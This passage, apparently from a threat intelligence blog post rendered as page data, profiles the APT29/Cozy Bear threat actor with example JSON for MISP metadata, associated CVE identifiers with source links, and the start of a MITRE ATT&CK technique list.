6,4883],{"class":9173},[1373,79628,79494],{"class":9176},[1373,79630,19057],{"class":9173},[1373,79632,79633],{"class":1375,"line":4798},[1373,79634,26468],{"class":1383},[1373,79636,79637],{"class":1375,"line":4806},[1373,79638,9613],{"class":1383},[1373,79640,79641,79643,79645,79647,79649,79651,79653,79655],{"class":1375,"line":4817},[1373,79642,26357],{"class":9152},[1373,79644,79601],{"class":9155},[1373,79646,183],{"class":9152},[1373,79648,4606],{"class":1383},[1373,79650,4883],{"class":9173},[1373,79652,3129],{"class":9176},[1373,79654,183],{"class":9173},[1373,79656,9062],{"class":1383},[1373,79658,79659,79661,79663,79665,79667,79669,79672,79674],{"class":1375,"line":4825},[1373,79660,26357],{"class":9152},[1373,79662,79485],{"class":9155},[1373,79664,183],{"class":9152},[1373,79666,4606],{"class":1383},[1373,79668,4883],{"class":9173},[1373,79670,79671],{"class":9176},"Midnight Blizzard",[1373,79673,183],{"class":9173},[1373,79675,9062],{"class":1383},[1373,79677,79678,79680,79682,79684,79686,79688,79691],{"class":1375,"line":4835},[1373,79679,26357],{"class":9152},[1373,79681,7585],{"class":9155},[1373,79683,183],{"class":9152},[1373,79685,4606],{"class":1383},[1373,79687,4883],{"class":9173},[1373,79689,79690],{"class":9176},"https:\u002F\u002Flearn.microsoft.com\u002Fen-us\u002Fmicrosoft-365\u002Fsecurity\u002Fintelligence\u002Fmicrosoft-threat-actor-naming",[1373,79692,19057],{"class":9173},[1373,79694,79695],{"class":1375,"line":4843},[1373,79696,4795],{"class":1383},[61,79698,79700],{"id":79699},"misp-suspected-victims-target-category-incident-type-threat-actor-operating-country-synonyms","MISP Suspected Victims \u002F Target Category \u002F Incident Type \u002F Threat Actor Operating Country \u002F Synonyms",[18,79702,79703],{},"Now we need to bring some color to the threat actor’s profile. Using MISP data we learn that the threat actor is a Russian state sponsor, focused on cyber espionage, targeting government and private sector entities located in the United States, China, New Zealand, Ukraine, Romania, Georgia, Japan, South Korea, Belgium, Kazakhstan, Brazil, Mexico, Turkey, Portugal and India. Country flags bring color to the threat actor profile. This is the threat actor profile version of Bob Ross’ “Happy Trees!”.",[18,79705,79706],{},[68,79707],{":width":10862,"alt":79708,"src":79709},"Threat-Actors-Cozy-Bear-MISP","\u002Fblog\u002Fhow-we-think-about-threat-actors\u002FCozy-Bear-Suspected-Victims.png",[18,79711,79712],{},"Example JSON MISP Data:",[1354,79714,79716],{"className":22307,"code":79715,"language":22309,"meta":219,"style":219},"\"misp_threat_actor\": {\n \"description\": \"A 2015 report by F-Secure describe APT29 as: 'The Dukes are a well-resourced, highly dedicated and organized cyberespionage group that we believe has been working for the Russian Federation since at least 2008 to collect intelligence in support of foreign and security policy decision-making. The Dukes show unusual confidence in their ability to continue successfully compromising their targets, as well as in their ability to operate with impunity. The Dukes primarily target Western governments and related organizations, such as government ministries and agencies, political think tanks, and governmental subcontractors. Their targets have also included the governments of members of the Commonwealth of Independent States;Asian, African, and Middle Eastern governments;organizations associated with Chechen extremism;and Russian speakers engaged in the illicit trade of controlled substances and drugs. The Dukes are known to employ a vast arsenal of malware toolsets, which we identify as MiniDuke, CosmicDuke, OnionDuke, CozyDuke, CloudDuke, SeaDuke, HammerDuke, PinchDuke, and GeminiDuke. In recent years, the Dukes have engaged in apparently biannual large - scale spear - phishing campaigns against hundreds or even thousands of recipients associated with governmental institutions and affiliated organizations. These campaigns utilize a smash - and - grab approach involving a fast but noisy breakin followed by the rapid collection and exfiltration of as much data as possible.If the compromised target is discovered to be of value, the Dukes will quickly switch the toolset used and move to using stealthier tactics focused on persistent compromise and long - term intelligence gathering. This threat actor targets government ministries and agencies in the West, Central Asia, East Africa, and the Middle East; Chechen extremist groups; Russian organized crime; and think tanks. It is suspected to be behind the 2015 compromise of unclassified networks at the White House, Department of State, Pentagon, and the Joint Chiefs of Staff. The threat actor includes all of the Dukes tool sets, including MiniDuke, CosmicDuke, OnionDuke, CozyDuke, SeaDuke, CloudDuke (aka MiniDionis), and HammerDuke (aka Hammertoss). '\",\n \"meta\": {\n \"attribution-confidence\": \"50\",\n \"cfr-suspected-state-sponsor\": \"Russian Federation\",\n \"cfr-suspected-victims\": [\n \"United States\",\n \"China\",\n \"New Zealand\",\n \"Ukraine\",\n \"Romania\",\n \"Georgia\",\n \"Japan\",\n \"South Korea\",\n \"Belgium\",\n \"Kazakhstan\",\n \"Brazil\",\n \"Mexico\",\n \"Turkey\",\n \"Portugal\",\n \"India\"\n ],\n \"cfr-target-category\": [\n \"Government\",\n \"Private sector\"\n ],\n \"cfr-type-of-incident\": [\n \"Espionage\"\n ],\n \"country\": \"RU\",\n \"refs\": [\n \"https:\u002F\u002Flabsblog.f-secure.com\u002F2015\u002F09\u002F17\u002Fthe-dukes-7-years-of-russian-cyber-espionage\u002F\",\n \"https:\u002F\u002Fwww2.fireeye.com\u002Frs\u002F848-DID-242\u002Fimages\u002Frpt-apt29-hammertoss.pdf\",\n \"https:\u002F\u002Fwww.us-cert.gov\u002Fsites\u002Fdefault\u002Ffiles\u002Fpublications\u002FAR-17-20045_Enhanced_Analysis_of_GRIZZLY_STEPPE_Activity.pdf\",\n \"https:\u002F\u002Fwww.fireeye.com\u002Fblog\u002Fthreat-research\u002F2017\u002F03\u002Fdissecting_one_ofap.html\",\n \"https:\u002F\u002Fwww.cfr.org\u002Finteractive\u002Fcyber-operations\u002Fdukes\",\n \"https:\u002F\u002Fpylos.co\u002F2018\u002F11\u002F18\u002Fcozybear-in-from-the-cold\u002F\",\n \"https:\u002F\u002Fcloudblogs.microsoft.com\u002Fmicrosoftsecure\u002F2018\u002F12\u002F03\u002Fanalysis-of-cyberattack-on-u-s-think-tanks-non-profits-public-sector-by-unidentified-attackers\u002F\",\n \"https:\u002F\u002Fwww.secureworks.com\u002Fresearch\u002Fthreat-profiles\u002Firon-hemlock\",\n \"https:\u002F\u002Fattack.mitre.org\u002Fgroups\u002FG0016\",\n \"https:\u002F\u002Funit42.paloaltonetworks.com\u002Fatoms\u002Fcloaked-ursa\u002F\",\n \"https:\u002F\u002Fgo.recordedfuture.com\u002Fhubfs\u002Freports\u002Fcta-2023-0127.pdf\"\n ],\n \"synonyms\": [\n \"Group 100\",\n \"COZY BEAR\",\n \"The Dukes\",\n \"Minidionis\",\n \"SeaDuke\",\n \"YTTRIUM\",\n \"IRON HEMLOCK\",\n \"Grizzly Steppe\",\n \"G0016\",\n \"ATK7\",\n \"Cloaked Ursa\",\n \"TA421\",\n \"Blue Kitsune\",\n \"ITG11\",\n \"BlueBravo\"\n ]\n",[886,79717,79718,79731,79751,79763,79782,79802,79815,79825,79835,79846,79856,79866,79877,79888,79899,79910,79921,79932,79943,79953,79964,79972,79976,79989,80000,80009,80013,80026,80035,80039,80058,80071,80082,80093,80104,80115,80126,80137,80148,80159,80170,80181,80190,80194,80207,80218,80229,80240,80251,80262,80273,80284,80295,80305,80316,80327,80338,80349,80360,80369],{"__ignoreMap":219},[1373,79719,79720,79722,79725,79727,79729],{"class":1375,"line":1376},[1373,79721,183],{"class":1387},[1373,79723,79724],{"class":1391},"misp_threat_actor",[1373,79726,183],{"class":1387},[1373,79728,20051],{"class":4640},[1373,79730,8904],{"class":1383},[1373,79732,79733,79735,79738,79740,79742,79744,79747,79749],{"class":1375,"line":220},[1373,79734,23732],{"class":9152},[1373,79736,79737],{"class":9155},"description",[1373,79739,183],{"class":9152},[1373,79741,4606],{"class":1383},[1373,79743,4883],{"class":9173},[1373,79745,79746],{"class":9176},"A 2015 report by F-Secure describe APT29 as: 'The Dukes are a well-resourced, highly dedicated and organized cyberespionage group that we believe has been working for the Russian Federation since at least 2008 to collect intelligence in support of foreign and security policy decision-making. The Dukes show unusual confidence in their ability to continue successfully compromising their targets, as well as in their ability to operate with impunity. The Dukes primarily target Western governments and related organizations, such as government ministries and agencies, political think tanks, and governmental subcontractors. Their targets have also included the governments of members of the Commonwealth of Independent States;Asian, African, and Middle Eastern governments;organizations associated with Chechen extremism;and Russian speakers engaged in the illicit trade of controlled substances and drugs. The Dukes are known to employ a vast arsenal of malware toolsets, which we identify as MiniDuke, CosmicDuke, OnionDuke, CozyDuke, CloudDuke, SeaDuke, HammerDuke, PinchDuke, and GeminiDuke. In recent years, the Dukes have engaged in apparently biannual large - scale spear - phishing campaigns against hundreds or even thousands of recipients associated with governmental institutions and affiliated organizations. These campaigns utilize a smash - and - grab approach involving a fast but noisy breakin followed by the rapid collection and exfiltration of as much data as possible.If the compromised target is discovered to be of value, the Dukes will quickly switch the toolset used and move to using stealthier tactics focused on persistent compromise and long - term intelligence gathering. This threat actor targets government ministries and agencies in the West, Central Asia, East Africa, and the Middle East; Chechen extremist groups; Russian organized crime; and think tanks. It is suspected to be behind the 2015 compromise of unclassified networks at the White House, Department of State, Pentagon, and the Joint Chiefs of Staff. The threat actor includes all of the Dukes tool sets, including MiniDuke, CosmicDuke, OnionDuke, CozyDuke, SeaDuke, CloudDuke (aka MiniDionis), and HammerDuke (aka Hammertoss). '",[1373,79748,183],{"class":9173},[1373,79750,9062],{"class":1383},[1373,79752,79753,79755,79757,79759,79761],{"class":1375,"line":1266},[1373,79754,23732],{"class":9152},[1373,79756,48983],{"class":9155},[1373,79758,183],{"class":9152},[1373,79760,4606],{"class":1383},[1373,79762,4765],{"class":1383},[1373,79764,79765,79767,79770,79772,79774,79776,79778,79780],{"class":1375,"line":1852},[1373,79766,19050],{"class":9152},[1373,79768,79769],{"class":9165},"attribution-confidence",[1373,79771,183],{"class":9152},[1373,79773,4606],{"class":1383},[1373,79775,4883],{"class":9173},[1373,79777,48192],{"class":9176},[1373,79779,183],{"class":9173},[1373,79781,9062],{"class":1383},[1373,79783,79784,79786,79789,79791,79793,79795,79798,79800],{"class":1375,"line":4692},[1373,79785,19050],{"class":9152},[1373,79787,79788],{"class":9165},"cfr-suspected-state-sponsor",[1373,79790,183],{"class":9152},[1373,79792,4606],{"class":1383},[1373,79794,4883],{"class":9173},[1373,79796,79797],{"class":9176},"Russian Federation",[1373,79799,183],{"class":9173},[1373,79801,9062],{"class":1383},[1373,79803,79804,79806,79809,79811,79813],{"class":1375,"line":4724},[1373,79805,19050],{"class":9152},[1373,79807,79808],{"class":9165},"cfr-suspected-victims",[1373,79810,183],{"class":9152},[1373,79812,4606],{"class":1383},[1373,79814,26352],{"class":1383},[1373,79816,79817,79819,79821,79823],{"class":1375,"line":4756},[1373,79818,26357],{"class":9173},[1373,79820,1494],{"class":9176},[1373,79822,183],{"class":9173},[1373,79824,9062],{"class":1383},[1373,79826,79827,79829,79831,79833],{"class":1375,"line":4768},[1373,79828,26357],{"class":9173},[1373,79830,61571],{"class":9176},[1373,79832,183],{"class":9173},[1373,79834,9062],{"class":1383},[1373,79836,79837,79839,79842,79844],{"class":1375,"line":4792},[1373,79838,26357],{"class":9173},[1373,79840,79841],{"class":9176},"New Zealand",[1373,79843,183],{"class":9173},[1373,79845,9062],{"class":1383},[1373,79847,79848,79850,79852,79854],{"class":1375,"line":4798},[1373,79849,26357],{"class":9173},[1373,79851,916],{"class":9176},[1373,79853,183],{"class":9173},[1373,79855,9062],{"class":1383},[1373,79857,79858,79860,79862,79864],{"class":1375,"line":4806},[1373,79859,26357],{"class":9173},[1373,79861,65838],{"class":9176},[1373,79863,183],{"class":9173},[1373,79865,9062],{"class":1383},[1373,79867,79868,79870,79873,79875],{"class":1375,"line":4817},[1373,79869,26357],{"class":9173},[1373,79871,79872],{"class":9176},"Georgia",[1373,79874,183],{"class":9173},[1373,79876,9062],{"class":1383},[1373,79878,79879,79881,79884,79886],{"class":1375,"line":4825},[1373,79880,26357],{"class":9173},[1373,79882,79883],{"class":9176},"Japan",[1373,79885,183],{"class":9173},[1373,79887,9062],{"class":1383},[1373,79889,79890,79892,79895,79897],{"class":1375,"line":4835},[1373,79891,26357],{"class":9173},[1373,79893,79894],{"class":9176},"South Korea",[1373,79896,183],{"class":9173},[1373,79898,9062],{"class":1383},[1373,79900,79901,79903,79906,79908],{"class":1375,"line":4843},[1373,79902,26357],{"class":9173},[1373,79904,79905],{"class":9176},"Belgium",[1373,79907,183],{"class":9173},[1373,79909,9062],{"class":1383},[1373,79911,79912,79914,79917,79919],{"class":1375,"line":4849},[1373,79913,26357],{"class":9173},[1373,79915,79916],{"class":9176},"Kazakhstan",[1373,79918,183],{"class":9173},[1373,79920,9062],{"class":1383},[1373,79922,79923,79925,79928,79930],{"class":1375,"line":4877},[1373,79924,26357],{"class":9173},[1373,79926,79927],{"class":9176},"Brazil",[1373,79929,183],{"class":9173},[1373,79931,9062],{"class":1383},[1373,79933,79934,79936,79939,79941],{"class":1375,"line":4915},[1373,79935,26357],{"class":9173},[1373,79937,79938],{"class":9176},"Mexico",[1373,79940,183],{"class":9173},[1373,79942,9062],{"class":1383},[1373,79944,79945,79947,79949,79951],{"class":1375,"line":4931},[1373,79946,26357],{"class":9173},[1373,79948,61598],{"class":9176},[1373,79950,183],{"class":9173},[1373,79952,9062],{"class":1383},[1373,79954,79955,79957,79960,79962],{"class":1375,"line":4947},[1373,79956,26357],{"class":9173},[1373,79958,79959],{"class":9176},"Portugal",[1373,79961,183],{"class":9173},[1373,79963,9062],{"class":1383},[1373,79965,79966,79968,79970],{"class":1375,"line":4952},[1373,79967,26357],{"class":9173},[1373,79969,65892],{"class":9176},[1373,79971,19057],{"class":9173},[1373,79973,79974],{"class":1375,"line":6776},[1373,79975,26366],{"class":1383},[1373,79977,79978,79980,79983,79985,79987],{"class":1375,"line":6781},[1373,79979,19050],{"class":9152},[1373,79981,79982],{"class":9165},"cfr-target-category",[1373,79984,183],{"class":9152},[1373,79986,4606],{"class":1383},[1373,79988,26352],{"class":1383},[1373,79990,79991,79993,79996,79998],{"class":1375,"line":7524},[1373,79992,26357],{"class":9173},[1373,79994,79995],{"class":9176},"Government",[1373,79997,183],{"class":9173},[1373,79999,9062],{"class":1383},[1373,80001,80002,80004,80007],{"class":1375,"line":7530},[1373,80003,26357],{"class":9173},[1373,80005,80006],{"class":9176},"Private sector",[1373,80008,19057],{"class":9173},[1373,80010,80011],{"class":1375,"line":7546},[1373,80012,26366],{"class":1383},[1373,80014,80015,80017,80020,80022,80024],{"class":1375,"line":7571},[1373,80016,19050],{"class":9152},[1373,80018,80019],{"class":9165},"cfr-type-of-incident",[1373,80021,183],{"class":9152},[1373,80023,4606],{"class":1383},[1373,80025,26352],{"class":1383},[1373,80027,80028,80030,80033],{"class":1375,"line":7598},[1373,80029,26357],{"class":9173},[1373,80031,80032],{"class":9176},"Espionage",[1373,80034,19057],{"class":9173},[1373,80036,80037],{"class":1375,"line":7615},[1373,80038,26366],{"class":1383},[1373,80040,80041,80043,80045,80047,80049,80051,80054,80056],{"class":1375,"line":7635},[1373,80042,19050],{"class":9152},[1373,80044,26274],{"class":9165},[1373,80046,183],{"class":9152},[1373,80048,4606],{"class":1383},[1373,80050,4883],{"class":9173},[1373,80052,80053],{"class":9176},"RU",[1373,80055,183],{"class":9173},[1373,80057,9062],{"class":1383},[1373,80059,80060,80062,80065,80067,80069],{"class":1375,"line":7640},[1373,80061,19050],{"class":9152},[1373,80063,80064],{"class":9165},"refs",[1373,80066,183],{"class":9152},[1373,80068,4606],{"class":1383},[1373,80070,26352],{"class":1383},[1373,80072,80073,80075,80078,80080],{"class":1375,"line":7648},[1373,80074,26357],{"class":9173},[1373,80076,80077],{"class":9176},"https:\u002F\u002Flabsblog.f-secure.com\u002F2015\u002F09\u002F17\u002Fthe-dukes-7-years-of-russian-cyber-espionage\u002F",[1373,80079,183],{"class":9173},[1373,80081,9062],{"class":1383},[1373,80083,80084,80086,80089,80091],{"class":1375,"line":7672},[1373,80085,26357],{"class":9173},[1373,80087,80088],{"class":9176},"https:\u002F\u002Fwww2.fireeye.com\u002Frs\u002F848-DID-242\u002Fimages\u002Frpt-apt29-hammertoss.pdf",[1373,80090,183],{"class":9173},[1373,80092,9062],{"class":1383},[1373,80094,80095,80097,80100,80102],{"class":1375,"line":7688},[1373,80096,26357],{"class":9173},[1373,80098,80099],{"class":9176},"https:\u002F\u002Fwww.us-cert.gov\u002Fsites\u002Fdefault\u002Ffiles\u002Fpublications\u002FAR-17-20045_Enhanced_Analysis_of_GRIZZLY_STEPPE_Activity.pdf",[1373,80101,183],{"class":9173},[1373,80103,9062],{"class":1383},[1373,80105,80106,80108,80111,80113],{"class":1375,"line":7709},[1373,80107,26357],{"class":9173},[1373,80109,80110],{"class":9176},"https:\u002F\u002Fwww.fireeye.com\u002Fblog\u002Fthreat-research\u002F2017\u002F03\u002Fdissecting_one_ofap.html",[1373,80112,183],{"class":9173},[1373,80114,9062],{"class":1383},[1373,80116,80117,80119,80122,80124],{"class":1375,"line":7714},[1373,80118,26357],{"class":9173},[1373,80120,80121],{"class":9176},"https:\u002F\u002Fwww.cfr.org\u002Finteractive\u002Fcyber-operations\u002Fdukes",[1373,80123,183],{"class":9173},[1373,80125,9062],{"class":1383},[1373,80127,80128,80130,80133,80135],{"class":1375,"line":7722},[1373,80129,26357],{"class":9173},[1373,80131,80132],{"class":9176},"https:\u002F\u002Fpylos.co\u002F2018\u002F11\u002F18\u002Fcozybear-in-from-the-cold\u002F",[1373,80134,183],{"class":9173},[1373,80136,9062],{"class":1383},[1373,80138,80139,80141,80144,80146],{"class":1375,"line":9903},[1373,80140,26357],{"class":9173},[1373,80142,80143],{"class":9176},"https:\u002F\u002Fcloudblogs.microsoft.com\u002Fmicrosoftsecure\u002F2018\u002F12\u002F03\u002Fanalysis-of-cyberattack-on-u-s-think-tanks-non-profits-public-sector-by-unidentified-attackers\u002F",[1373,80145,183],{"class":9173},[1373,80147,9062],{"class":1383},[1373,80149,80150,80152,80155,80157],{"class":1375,"line":9908},[1373,80151,26357],{"class":9173},[1373,80153,80154],{"class":9176},"https:\u002F\u002Fwww.secureworks.com\u002Fresearch\u002Fthreat-profiles\u002Firon-hemlock",[1373,80156,183],{"class":9173},[1373,80158,9062],{"class":1383},[1373,80160,80161,80163,80166,80168],{"class":1375,"line":9913},[1373,80162,26357],{"class":9173},[1373,80164,80165],{"class":9176},"https:\u002F\u002Fattack.mitre.org\u002Fgroups\u002FG0016",[1373,80167,183],{"class":9173},[1373,80169,9062],{"class":1383},[1373,80171,80172,80174,80177,80179],{"class":1375,"line":9932},[1373,80173,26357],{"class":9173},[1373,80175,80176],{"class":9176},"https:\u002F\u002Funit42.paloaltonetworks.com\u002Fatoms\u002Fcloaked-ursa\u002F",[1373,80178,183],{"class":9173},[1373,80180,9062],{"class":1383},[1373,80182,80183,80185,80188],{"class":1375,"line":9937},[1373,80184,26357],{"class":9173},[1373,80186,80187],{"class":9176},"https:\u002F\u002Fgo.recordedfuture.com\u002Fhubfs\u002Freports\u002Fcta-2023-0127.pdf",[1373,80189,19057],{"class":9173},[1373,80191,80192],{"class":1375,"line":9957},[1373,80193,26366],{"class":1383},[1373,80195,80196,80198,80201,80203,80205],{"class":1375,"line":9962},[1373,80197,19050],{"class":9152},[1373,80199,80200],{"class":9165},"synonyms",[1373,80202,183],{"class":9152},[1373,80204,4606],{"class":1383},[1373,80206,26352],{"class":1383},[1373,80208,80209,80211,80214,80216],{"class":1375,"line":15955},[1373,80210,26357],{"class":9173},[1373,80212,80213],{"class":9176},"Group 100",[1373,80215,183],{"class":9173},[1373,80217,9062],{"class":1383},[1373,80219,80220,80222,80225,80227],{"class":1375,"line":16030},[1373,80221,26357],{"class":9173},[1373,80223,80224],{"class":9176},"COZY BEAR",[1373,80226,183],{"class":9173},[1373,80228,9062],{"class":1383},[1373,80230,80231,80233,80236,80238],{"class":1375,"line":16035},[1373,80232,26357],{"class":9173},[1373,80234,80235],{"class":9176},"The Dukes",[1373,80237,183],{"class":9173},[1373,80239,9062],{"class":1383},[1373,80241,80242,80244,80247,80249],{"class":1375,"line":16083},[1373,80243,26357],{"class":9173},[1373,80245,80246],{"class":9176},"Minidionis",[1373,80248,183],{"class":9173},[1373,80250,9062],{"class":1383},[1373,80252,80253,80255,80258,80260],{"class":1375,"line":16098},[1373,80254,26357],{"class":9173},[1373,80256,80257],{"class":9176},"SeaDuke",[1373,80259,183],{"class":9173},[1373,80261,9062],{"class":1383},[1373,80263,80264,80266,80269,80271],{"class":1375,"line":16103},[1373,80265,26357],{"class":9173},[1373,80267,80268],{"class":9176},"YTTRIUM",[1373,80270,183],{"class":9173},[1373,80272,9062],{"class":1383},[1373,80274,80275,80277,80280,80282],{"class":1375,"line":16147},[1373,80276,26357],{"class":9173},[1373,80278,80279],{"class":9176},"IRON HEMLOCK",[1373,80281,183],{"class":9173},[1373,80283,9062],{"class":1383},[1373,80285,80286,80288,80291,80293],{"class":1375,"line":16153},[1373,80287,26357],{"class":9173},[1373,80289,80290],{"class":9176},"Grizzly Steppe",[1373,80292,183],{"class":9173},[1373,80294,9062],{"class":1383},[1373,80296,80297,80299,80301,80303],{"class":1375,"line":16164},[1373,80298,26357],{"class":9173},[1373,80300,79533],{"class":9176},[1373,80302,183],{"class":9173},[1373,80304,9062],{"class":1383},[1373,80306,80307,80309,80312,80314],{"class":1375,"line":16170},[1373,80308,26357],{"class":9173},[1373,80310,80311],{"class":9176},"ATK7",[1373,80313,183],{"class":9173},[1373,80315,9062],{"class":1383},[1373,80317,80318,80320,80323,80325],{"class":1375,"line":16187},[1373,80319,26357],{"class":9173},[1373,80321,80322],{"class":9176},"Cloaked Ursa",[1373,80324,183],{"class":9173},[1373,80326,9062],{"class":1383},[1373,80328,80329,80331,80334,80336],{"class":1375,"line":16198},[1373,80330,26357],{"class":9173},[1373,80332,80333],{"class":9176},"TA421",[1373,80335,183],{"class":9173},[1373,80337,9062],{"class":1383},[1373,80339,80340,80342,80345,80347],{"class":1375,"line":16204},[1373,80341,26357],{"class":9173},[1373,80343,80344],{"class":9176},"Blue Kitsune",[1373,80346,183],{"class":9173},[1373,80348,9062],{"class":1383},[1373,80350,80351,80353,80356,80358],{"class":1375,"line":16210},[1373,80352,26357],{"class":9173},[1373,80354,80355],{"class":9176},"ITG11",[1373,80357,183],{"class":9173},[1373,80359,9062],{"class":1383},[1373,80361,80362,80364,80367],{"class":1375,"line":16254},[1373,80363,26357],{"class":9173},[1373,80365,80366],{"class":9176},"BlueBravo",[1373,80368,19057],{"class":9173},[1373,80370,80371],{"class":1375,"line":18499},[1373,80372,80373],{"class":1383}," ]\n",[61,80375,80377],{"id":80376},"cves-associated-with-threat-actor-evidence-backed","CVEs Associated with Threat Actor (Evidence Backed)",[18,80379,80380],{},"We can expand our research to explore CVEs tied to the threat actor which is evidence backed by reputable sources. This should send some joy down the spine of any vulnerability management team as they verify any of these CVEs exist in their most recent scan data.",[18,80382,80383],{},[68,80384],{":width":10862,"alt":80385,"src":80386},"Threat-Actors-Cozy-Bear-CVE","\u002Fblog\u002Fhow-we-think-about-threat-actors\u002FCozy-Bear-CVE.png",[18,80388,80389],{},"Example JSON CVE References:",[1354,80391,80393],{"className":22307,"code":80392,"language":22309,"meta":219,"style":219},"\"cve_references\": [\n {\n \"url\": \"https:\u002F\u002Fwww.recordedfuture.com\u002Frussian-apt-toolkits\",\n \"date_added\": \"2016-08-04\",\n \"cve\": [\n \"cve-2010-0232\",\n \"cve-2010-4398\",\n \"cve-2013-0640\",\n \"cve-2013-0641\"\n ]\n },\n {\n \"url\": \"https:\u002F\u002Fmedia.defense.gov\u002F2020\u002Fjul\u002F16\u002F2002457639\u002F-1\u002F-1\u002F0\u002Fncsc_apt29_advisory-quad-official-20200709-1810.pdf\",\n \"date_added\": \"2020-07-16\",\n \"cve\": [\n \"cve-2018-13379\",\n \"cve-2019-9670\",\n \"cve-2019-11510\",\n \"cve-2019-19781\"\n ]\n",[886,80394,80395,80408,80412,80431,80449,80461,80472,80483,80494,80503,80507,80511,80515,80534,80553,80565,80576,80587,80598,80607],{"__ignoreMap":219},[1373,80396,80397,80399,80402,80404,80406],{"class":1375,"line":1376},[1373,80398,183],{"class":1387},[1373,80400,80401],{"class":1391},"cve_references",[1373,80403,183],{"class":1387},[1373,80405,20051],{"class":4640},[1373,80407,9050],{"class":1383},[1373,80409,80410],{"class":1375,"line":220},[1373,80411,26177],{"class":1383},[1373,80413,80414,80416,80418,80420,80422,80424,80427,80429],{"class":1375,"line":1266},[1373,80415,19050],{"class":9152},[1373,80417,7585],{"class":9155},[1373,80419,183],{"class":9152},[1373,80421,4606],{"class":1383},[1373,80423,4883],{"class":9173},[1373,80425,80426],{"class":9176},"https:\u002F\u002Fwww.recordedfuture.com\u002Frussian-apt-toolkits",[1373,80428,183],{"class":9173},[1373,80430,9062],{"class":1383},[1373,80432,80433,80435,80437,80439,80441,80443,80445,80447],{"class":1375,"line":1852},[1373,80434,19050],{"class":9152},[1373,80436,12998],{"class":9155},[1373,80438,183],{"class":9152},[1373,80440,4606],{"class":1383},[1373,80442,4883],{"class":9173},[1373,80444,79513],{"class":9176},[1373,80446,183],{"class":9173},[1373,80448,9062],{"class":1383},[1373,80450,80451,80453,80455,80457,80459],{"class":1375,"line":4692},[1373,80452,19050],{"class":9152},[1373,80454,242],{"class":9155},[1373,80456,183],{"class":9152},[1373,80458,4606],{"class":1383},[1373,80460,26352],{"class":1383},[1373,80462,80463,80465,80468,80470],{"class":1375,"line":4724},[1373,80464,26357],{"class":9173},[1373,80466,80467],{"class":9176},"cve-2010-0232",[1373,80469,183],{"class":9173},[1373,80471,9062],{"class":1383},[1373,80473,80474,80476,80479,80481],{"class":1375,"line":4756},[1373,80475,26357],{"class":9173},[1373,80477,80478],{"class":9176},"cve-2010-4398",[1373,80480,183],{"class":9173},[1373,80482,9062],{"class":1383},[1373,80484,80485,80487,80490,80492],{"class":1375,"line":4768},[1373,80486,26357],{"class":9173},[1373,80488,80489],{"class":9176},"cve-2013-0640",[1373,80491,183],{"class":9173},[1373,80493,9062],{"class":1383},[1373,80495,80496,80498,80501],{"class":1375,"line":4792},[1373,80497,26357],{"class":9173},[1373,80499,80500],{"class":9176},"cve-2013-0641",[1373,80502,19057],{"class":9173},[1373,80504,80505],{"class":1375,"line":4798},[1373,80506,80373],{"class":1383},[1373,80508,80509],{"class":1375,"line":4806},[1373,80510,23985],{"class":1383},[1373,80512,80513],{"class":1375,"line":4817},[1373,80514,26177],{"class":1383},[1373,80516,80517,80519,80521,80523,80525,80527,80530,80532],{"class":1375,"line":4825},[1373,80518,19050],{"class":9152},[1373,80520,7585],{"class":9155},[1373,80522,183],{"class":9152},[1373,80524,4606],{"class":1383},[1373,80526,4883],{"class":9173},[1373,80528,80529],{"class":9176},"https:\u002F\u002Fmedia.defense.gov\u002F2020\u002Fjul\u002F16\u002F2002457639\u002F-1\u002F-1\u002F0\u002Fncsc_apt29_advisory-quad-official-20200709-1810.pdf",[1373,80531,183],{"class":9173},[1373,80533,9062],{"class":1383},[1373,80535,80536,80538,80540,80542,80544,80546,80549,80551],{"class":1375,"line":4835},[1373,80537,19050],{"class":9152},[1373,80539,12998],{"class":9155},[1373,80541,183],{"class":9152},[1373,80543,4606],{"class":1383},[1373,80545,4883],{"class":9173},[1373,80547,80548],{"class":9176},"2020-07-16",[1373,80550,183],{"class":9173},[1373,80552,9062],{"class":1383},[1373,80554,80555,80557,80559,80561,80563],{"class":1375,"line":4843},[1373,80556,19050],{"class":9152},[1373,80558,242],{"class":9155},[1373,80560,183],{"class":9152},[1373,80562,4606],{"class":1383},[1373,80564,26352],{"class":1383},[1373,80566,80567,80569,80572,80574],{"class":1375,"line":4849},[1373,80568,26357],{"class":9173},[1373,80570,80571],{"class":9176},"cve-2018-13379",[1373,80573,183],{"class":9173},[1373,80575,9062],{"class":1383},[1373,80577,80578,80580,80583,80585],{"class":1375,"line":4877},[1373,80579,26357],{"class":9173},[1373,80581,80582],{"class":9176},"cve-2019-9670",[1373,80584,183],{"class":9173},[1373,80586,9062],{"class":1383},[1373,80588,80589,80591,80594,80596],{"class":1375,"line":4915},[1373,80590,26357],{"class":9173},[1373,80592,80593],{"class":9176},"cve-2019-11510",[1373,80595,183],{"class":9173},[1373,80597,9062],{"class":1383},[1373,80599,80600,80602,80605],{"class":1375,"line":4931},[1373,80601,26357],{"class":9173},[1373,80603,80604],{"class":9176},"cve-2019-19781",[1373,80606,19057],{"class":9173},[1373,80608,80609],{"class":1375,"line":4947},[1373,80610,80373],{"class":1383},[61,80612,80614],{"id":80613},"mitre-attack-techniques-aliases","MITRE Attack Techniques \u002F Aliases",[18,80616,80617],{},"Now we can really spice things up for the SOC analyst team with the addition of MITRE Att&ck references used by the threat actor.",[18,80619,80620],{},[68,80621],{":width":10862,"alt":80622,"src":80623},"Threat-Actors-Cozy-Bear-Mitre","\u002Fblog\u002Fhow-we-think-about-threat-actors\u002FCozy-Bear-Mitre.png",[18,80625,80626],{},"Example JSON Mitre Att&ck:",[1354,80628,80630],{"className":22307,"code":80629,"language":22309,"meta":219,"style":219}," \"mitre_attack_group\": {\n \"name\": \"APT29\",\n \"aliases\": [\n \"APT29\",\n \"YTTRIUM\",\n \"The Dukes\",\n \"Cozy Bear\",\n \"CozyDuke\"\n ],\n \"description\": \"APT29 is threat group that has been attributed to the Russian government and has operated since at least 2008. This group reportedly compromised the Democratic National Committee starting in the summer of 2015. \",\n \"techniques\": [\n {\n \"technique_id\": \"T1001\",\n \"technique_name\": \"Data Obfuscation\",\n \"sub_technique\": \"002\",\n \"sub_technique_name\": \"Steganography\",\n \"tactic\": [\n \"command-and-control\"\n ]\n },\n {\n \"technique_id\": \"T1027\",\n \"technique_name\": \"Obfuscated Files or Information\",\n \"tactic\": [\n \"defense-evasion\"\n ]\n },\n {\n \"technique_id\": \"T1027\",\n \"technique_name\": \"Obfuscated Files or Information\",\n \"sub_technique\": \"002\",\n \"sub_technique_name\": \"Software Packing\",\n \"tactic\": [\n 